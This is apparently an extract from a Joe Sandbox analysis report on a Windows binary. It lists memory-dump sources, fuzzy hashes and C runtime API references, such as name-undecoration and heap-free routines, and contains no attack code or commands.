Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb278fcbab84e79844a6bb326d706370cb0841fbcbdcc7f1db53f34160a87449
• Instruction ID: 1690a5ca094b902b93a52e29c8e708b1635dc7e3c3cf4504ca87f4e6016675df
• Opcode Fuzzy Hash: bb278fcbab84e79844a6bb326d706370cb0841fbcbdcc7f1db53f34160a87449
• Instruction Fuzzy Hash: 55617071E006199FDB18DF69C8847AEF7F5FF48310F148269D929A7380DB78A9058BE0
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbc7dcca5fb21b1d780ea2455a71dc5655a3cdeff3e7a7c54337a88c26725de1
• Instruction ID: 5d5f110f66bc5ce451a7ccb1f50e2f835457bf563d994d63b608919812f8b62b
• Opcode Fuzzy Hash: bbc7dcca5fb21b1d780ea2455a71dc5655a3cdeff3e7a7c54337a88c26725de1
• Instruction Fuzzy Hash: FD514272D1C4B814EB1D427E48723FDBEF29B85202F0E82EAD9A3667D9C53943069B50
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7f4bd42cfd9eb192761cb6ca9ad15c1eb5602e5bb8b1c31f7f3d5cf6e0c39460
                                                                                                        • Instruction ID: 0abfed6a49c0a07d6009875bff1021458b10984b4e7787e4663ecaeb24d29306
                                                                                                        • Opcode Fuzzy Hash: 7f4bd42cfd9eb192761cb6ca9ad15c1eb5602e5bb8b1c31f7f3d5cf6e0c39460
                                                                                                        • Instruction Fuzzy Hash: 1161AD55C18FD846E7038B3D98422E6B3A0BFFA299F18D746FDA436132EB21B6C55310
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de27e06f2a39b23eb8ae741f348f2a15afde0b07a50070670832938456a0f7b6
                                                                                                        • Instruction ID: e0f8da9cee18320c4c9eb9a8238dc3c035d206add2158abeb83e0a1acf255fc3
                                                                                                        • Opcode Fuzzy Hash: de27e06f2a39b23eb8ae741f348f2a15afde0b07a50070670832938456a0f7b6
                                                                                                        • Instruction Fuzzy Hash: 59512371D1C4B814EB5D427E48B22FDBDF39B85202F0E81EAD5A3A67D9C53943069B50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3785d1aba6a0b3de4b733dd2f1260e456c2e8fd87cc52f51b4a1577b6e1c63f3
                                                                                                        • Instruction ID: aa11d9397b75ba0f54b8aba73cb4f1a1a9e07bcc8630b48fe0a85b733d98bc11
                                                                                                        • Opcode Fuzzy Hash: 3785d1aba6a0b3de4b733dd2f1260e456c2e8fd87cc52f51b4a1577b6e1c63f3
                                                                                                        • Instruction Fuzzy Hash: 2C514652648F6991D72A0B3DD4912F3E3D1AFD530AF01C70EEDE565647E732E208B690
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                                                                                        • Instruction ID: b100de1a58538a3d85e35dc7e80680a77e3cf459e61813b34beb8fc66f37bb88
                                                                                                        • Opcode Fuzzy Hash: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                                                                                        • Instruction Fuzzy Hash: 7751F232D047898BD711CF3CC5856A9B3A0BFE9348F19C75AD8856B217EB30B6898700
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                        • Instruction ID: 1e9b07d564fe1c900b59a9c56ff74c1136568e868d998312ac7df6c9dfae3ee1
                                                                                                        • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                        • Instruction Fuzzy Hash: 7341A2327215128BD708CF3DC895BA6F7E5FB98310F158769E42ACB2C2DB35E9108B84
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8823ce6f08d49e212022aed1a05e9cffe4dc0536a4605498ad7ee7ed4330dc5f
                                                                                                        • Instruction ID: f10ec451a69faa747db9d3f146422314172ab15981148f212458ff6fbfcafd99
                                                                                                        • Opcode Fuzzy Hash: 8823ce6f08d49e212022aed1a05e9cffe4dc0536a4605498ad7ee7ed4330dc5f
                                                                                                        • Instruction Fuzzy Hash: 945123B1A087018FD325CF28D491A5AB7F4FF9D304B548A2EE49ADB610E730FA45CB85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40a7fc57c80b7e8d53dd0e9a18a31d8bc4b463554dd35015f19d48620d764293
                                                                                                        • Instruction ID: fd6c3f9923ad998c28112cb022c8414598cf4b0a6262d583ea4937c61fe72da7
                                                                                                        • Opcode Fuzzy Hash: 40a7fc57c80b7e8d53dd0e9a18a31d8bc4b463554dd35015f19d48620d764293
                                                                                                        • Instruction Fuzzy Hash: E04162CAC29F9C06E513A73558821D1E690AFFB4ED224E387FC7475672E712B5E52320
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 29c9d7e43dfe805d176ee8a0da5108ee633dbb35ea7e4490e5854e383a146dea
                                                                                                        • Instruction ID: 1445a963c69c76c7cc27a31e691902624734c9ab290ff609cb86a5155a077a11
                                                                                                        • Opcode Fuzzy Hash: 29c9d7e43dfe805d176ee8a0da5108ee633dbb35ea7e4490e5854e383a146dea
                                                                                                        • Instruction Fuzzy Hash: 60314D67806F5991C713AB3D84072B3E3E2EFD4216F26C74DE9D666306FB35A348A210
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 2055c343859a8b33f8744c7f1061cc9a6e48e52876d24c58fe5e51ee7d06d49b
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: 5011C8B72004C147D6198A2DD8BC5F7A7D5EBCD321BED43FAD0828B758D623AAC59504
                                                                                                        APIs
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E2F3
                                                                                                          • Part of subcall function 00B1B218: DName::doPchar.LIBVCRUNTIME ref: 00B1B23F
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E302
                                                                                                          • Part of subcall function 00B1B55A: DName::operator+=.LIBVCRUNTIME ref: 00B1B570
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E622
                                                                                                        • UnDecorator::getSignedDimension.LIBCMT ref: 00B1E62B
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E639
• DName::operator+=.LIBVCRUNTIME ref: 00B1E642
• UnDecorator::getSignedDimension.LIBCMT ref: 00B1E64B
• DName::operator+.LIBCMT ref: 00B1E659
• DName::operator+=.LIBVCRUNTIME ref: 00B1E662
• UnDecorator::getSignedDimension.LIBCMT ref: 00B1E66B
• DName::operator+.LIBCMT ref: 00B1E679
• DName::operator+=.LIBVCRUNTIME ref: 00B1E682
• DName::operator+.LIBCMT ref: 00B1E69B
• DName::operator+=.LIBVCRUNTIME ref: 00B1E6A4
• DName::operator+.LIBCMT ref: 00B1E6B1
• UnDecorator::getDataType.LIBVCRUNTIME ref: 00B1E6C0
  • Part of subcall function 00B1D416: DName::DName.LIBVCRUNTIME ref: 00B1D422
• DName::operator+.LIBCMT ref: 00B1E6E8
• DName::operator+.LIBCMT ref: 00B1E73A
• DName::operator+=.LIBCMT ref: 00B1E6D8
  • Part of subcall function 00B1B623: DName::DName.LIBVCRUNTIME ref: 00B1B63D
• DName::operator=.LIBVCRUNTIME ref: 00B1E2E0
  • Part of subcall function 00B1B451: DName::doPchar.LIBVCRUNTIME ref: 00B1B470
• DName::DName.LIBVCRUNTIME ref: 00B1E344
• DName::operator+.LIBCMT ref: 00B1E350
• DName::operator+=.LIBVCRUNTIME ref: 00B1E35C
• DName::operator+=.LIBCMT ref: 00B1E372
• DName::operator+=.LIBCMT ref: 00B1E37C
• UnDecorator::getZName.LIBVCRUNTIME ref: 00B1E3B5
• DName::DName.LIBVCRUNTIME ref: 00B1E3DD
• DName::operator+.LIBCMT ref: 00B1E3EC
• DName::operator+=.LIBVCRUNTIME ref: 00B1E40C
• DName::DName.LIBVCRUNTIME ref: 00B1E423
• DName::DName.LIBVCRUNTIME ref: 00B1E49D
• DName::DName.LIBVCRUNTIME ref: 00B1E4C2
• UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00B1E502
• UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00B1E542
• DName::operator=.LIBVCRUNTIME ref: 00B1E59D
• DName::operator+.LIBCMT ref: 00B1E5B5
• DName::operator=.LIBVCRUNTIME ref: 00B1E5DE
• DName::operator=.LIBVCRUNTIME ref: 00B1E88E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Name::operator+Name::operator+=$Name$Name::$Decorator::get$Name::operator=$DimensionSigned$EncodingName::doPcharString$DataType
• String ID: `anonymous namespace'$`string'$operator
• API String ID: 2067090289-815891235
• Opcode ID: 72f0ac26ee613d3c575e619c50fb905254b33bf5cf1044e8df0d3f922345f32e
• Instruction ID: 44f020cba4e74cdd6fa90ed0273a7851ed811c208a543fab102d0e9bc2de850d
• Opcode Fuzzy Hash: 72f0ac26ee613d3c575e619c50fb905254b33bf5cf1044e8df0d3f922345f32e
• Instruction Fuzzy Hash: 6F02A1708042099EDF19DFA4D895EFEBBF5EF19300F90049AE961A7291DB70DAC5CB60
APIs
• DName::DName.LIBVCRUNTIME ref: 00B1DD60
• DName::operator+.LIBCMT ref: 00B1DD6F
• UnDecorator::getScope.LIBVCRUNTIME ref: 00B1DD8E
• DName::DName.LIBVCRUNTIME ref: 00B1DD9B
• DName::operator+.LIBCMT ref: 00B1DDA7
• DName::operator+.LIBCMT ref: 00B1DDB7
• DName::DName.LIBVCRUNTIME ref: 00B1DDCB
• DName::operator+.LIBCMT ref: 00B1DDDA
• UnDecorator::getThisType.LIBVCRUNTIME ref: 00B1DE23
• DName::DName.LIBVCRUNTIME ref: 00B1DE5B
• DName::operator+.LIBCMT ref: 00B1DE67
• DName::operator+.LIBCMT ref: 00B1DE77
• UnDecorator::getThisType.LIBVCRUNTIME ref: 00B1DE89
  • Part of subcall function 00B1FC2E: UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00B1FC54
• DName::operator|=.LIBCMT ref: 00B1DE93
• DName::DName.LIBVCRUNTIME ref: 00B1DE9F
• DName::operator+.LIBCMT ref: 00B1DEAD
  • Part of subcall function 00B1B55A: DName::operator+=.LIBVCRUNTIME ref: 00B1B570
• DName::operator+.LIBCMT ref: 00B1DEE7
• DName::DName.LIBVCRUNTIME ref: 00B1DF13
• DName::operator+.LIBCMT ref: 00B1DF22
• DName::operator+.LIBCMT ref: 00B1DF30
• _HeapManager::getMemory.LIBVCRUNTIME ref: 00B1DF48
• operator+.LIBVCRUNTIME ref: 00B1E07C
Similarity
• API ID: Name::operator+$NameName::$Decorator::get$Type$This$DataHeapIndirectManager::getMemoryName::operator+=Name::operator|=Scopeoperator+
• String ID:
• API String ID: 1537886362-0
• Opcode ID: f480cf226f3b2eae215447235a956f3e8f86eb56afeecb1f1fe61d2c0c462261
• Instruction ID: 46da0faff94d601da7d23c3aa758f31533fc8893c16fe80a303eec38d1fa7607
• Opcode Fuzzy Hash: f480cf226f3b2eae215447235a956f3e8f86eb56afeecb1f1fe61d2c0c462261
• Instruction Fuzzy Hash: 53C12271D00209AFCB08DBA8D895DEEB7F5EF19300F9081A9E526E7291DF749A85CB50
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00B987E8,00000FA0,AE695AF0,?,?,?,?,00B4EEC0,000000FF), ref: 00B00652
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B4EEC0,000000FF), ref: 00B0065D
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B4EEC0,000000FF), ref: 00B0066E
• GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B00684
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B00692
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B006A0
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B006CB
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B006D6
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,00B4EEC0,000000FF), ref: 00B006F9
• ___scrt_fastfail.LIBCMT ref: 00B0070A
• DeleteCriticalSection.KERNEL32(00B987E8,00000007,?,?,?,?,00B4EEC0,000000FF), ref: 00B00715
• CloseHandle.KERNEL32(00000000,?,?,?,?,00B4EEC0,000000FF), ref: 00B00725
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B00658
• InitializeConditionVariable, xrefs: 00B0067E
• SleepConditionVariableCS, xrefs: 00B0068A
• kernel32.dll, xrefs: 00B00669
• WakeAllConditionVariable, xrefs: 00B00698
Similarity
• API ID: AddressHandleProc$CriticalModuleSection__crt_fast_encode_pointer$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2634751764-1714406822
• Opcode ID: 9c96b3cbae99b7f033206a1828fb4437148229a49e660b071972067327906676
• Instruction ID: 070f2de5612ffc88a580df7d1476f3cb2bc9e8bd3f337a0f1e3655506c7ec946
• Opcode Fuzzy Hash: 9c96b3cbae99b7f033206a1828fb4437148229a49e660b071972067327906676
• Instruction Fuzzy Hash: D621B531650711ABD7116F74AD99B667BE9DB46F92F0401E5F901E33E0DE758C008A64
APIs
• UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00B1E901
• DName::operator=.LIBVCRUNTIME ref: 00B1E912
• DName::operator+=.LIBCMT ref: 00B1E920
• UnDecorator::getPtrRefType.LIBCMT ref: 00B1E952
• operator+.LIBVCRUNTIME ref: 00B1E973
• UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00B1E9D0
• UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00B1E9D9
• UnDecorator::getPtrRefDataType.LIBVCRUNTIME ref: 00B1E9F1
• UnDecorator::getScopedName.LIBVCRUNTIME ref: 00B1EA2D
• operator+.LIBVCRUNTIME ref: 00B1EA4E
• DName::DName.LIBVCRUNTIME ref: 00B1EA60
• DName::operator=.LIBVCRUNTIME ref: 00B1EA8B
• DName::operator+=.LIBCMT ref: 00B1EA99
Strings
Similarity
• API ID: Decorator::get$Type$Data$BasicNameName::operator+=Name::operator=operator+$IndirectName::Scoped
• String ID: std::nullptr_t$std::nullptr_t $volatile
• API String ID: 2673590388-294867888
• Opcode ID: 8906340a44d863708853d57ed96ebdc8e3e325c16791f17abb4cd133672eb579
• Instruction ID: 22cc3cd4c6a43490c0227e1dd6e498a50e310ba05b2bc6273bf170349e7bf63c
• Opcode Fuzzy Hash: 8906340a44d863708853d57ed96ebdc8e3e325c16791f17abb4cd133672eb579
• Instruction Fuzzy Hash: 9751B371804205EECB11DF28C9859E9BFF6FF06340B9441DAF815A7261EB32DAC5CB60
APIs
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 51e2b2bedafe23d6292229a0883f1cff7ff20588cc6feef98feef105e40cf9e6
• Instruction ID: 2b9bbd1643dcd9b2e6c7acdff8bc6c97a4edbc8d1e06e94b8687193549136037
• Opcode Fuzzy Hash: 51e2b2bedafe23d6292229a0883f1cff7ff20588cc6feef98feef105e40cf9e6
• Instruction Fuzzy Hash: 2DB1BD71D00205AFDB21DF68C881BEEBBF5FF09300F2441AAF599A7252DB75A945CB60
APIs
• ___free_lconv_mon.LIBCMT ref: 00B3DB3C
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEA8
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEBA
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CECC
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEDE
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEF0
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF02
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF14
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF26
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF38
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF4A
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF5C
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF6E
  • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF80
• _free.LIBCMT ref: 00B3DB31
  • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
  • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
• _free.LIBCMT ref: 00B3DB53
• _free.LIBCMT ref: 00B3DB68
• _free.LIBCMT ref: 00B3DB73
• _free.LIBCMT ref: 00B3DB95
• _free.LIBCMT ref: 00B3DBA8
• _free.LIBCMT ref: 00B3DBB6
• _free.LIBCMT ref: 00B3DBC1
• _free.LIBCMT ref: 00B3DBF9
• _free.LIBCMT ref: 00B3DC00
• _free.LIBCMT ref: 00B3DC1D
• _free.LIBCMT ref: 00B3DC35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
